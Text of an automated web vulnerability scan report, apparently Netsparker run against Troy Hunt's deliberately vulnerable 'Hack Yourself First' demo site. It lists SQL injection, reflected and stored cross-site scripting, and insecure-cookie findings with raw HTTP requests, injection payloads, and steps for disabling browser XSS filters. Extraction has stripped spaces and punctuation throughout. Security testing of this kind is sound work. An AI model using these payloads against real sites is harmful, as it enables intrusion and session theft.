RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
